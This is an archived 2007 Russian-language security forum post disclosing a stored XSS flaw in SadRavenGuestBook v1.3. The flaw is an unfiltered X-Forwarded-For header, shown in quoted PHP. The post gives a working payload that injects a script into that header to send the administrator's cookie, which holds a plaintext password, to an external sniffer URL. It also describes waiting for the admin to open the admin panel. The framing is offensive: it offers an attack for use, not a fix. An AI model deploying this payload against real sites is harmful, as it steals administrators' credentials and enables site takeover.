ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу active XSS SadRavenGuestBook v1.3
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

active XSS SadRavenGuestBook v1.3
  #1  
Старый 01.03.2007, 20:24
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию active XSS SadRavenGuestBook v1.3
Недавно ред саратов писал об дырке в этой же буке связанной с файлом пароля, где он хранится в зашифрованном виде, в версии 1.3 эту багу пофиксили, но пароль в куках хранят в открытом виде, значит нам нужна иксс атака)
ошибка заключается в отсутствии фильтрации поля: TTP_X_FORWARDED_FOR
в 103-107 строчках файла index.php
PHP код:
if(empty($ip)):
        if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); }
        else { $ip=getenv('REMOTE_ADDR');}
endif; 
мы же можем изменить это поле как угодно! например юзая Mozilla Firefox и плагин ModifyHeaders.
меняем поле TTP_X_FORWARDED_FOR на:
Код HTML:
67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS --
где айпи - отображаемый админу (фальшивый) ну а http://test1.ru/s.php - адрес нашего снифера.
теперь, запостив мессагу с таким TTP_X_FORWARDED_FOR, будем ждать, пока админ не зайдет в админку, и нам на снифер не утекут его куки с ОТКРЫТЫМ(!) паролем.

Следуя пословице лучше 1 раз увидеть, чем 100 раз услышать, ну или 10 раз прочитать, качаем видео (800кб):
http://slil.ru/24013333
В архиве с видео лежит код снифера и более подробный анализ баги.
ЗЫ: плиз, поместите видео на video.antichat.ru ))
ЗЫЫ: помоему это статья, т.к. есть анализ дырки, а не просто соль) но если модеры так не считают, перенесите плиз в более подходящий раздел.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ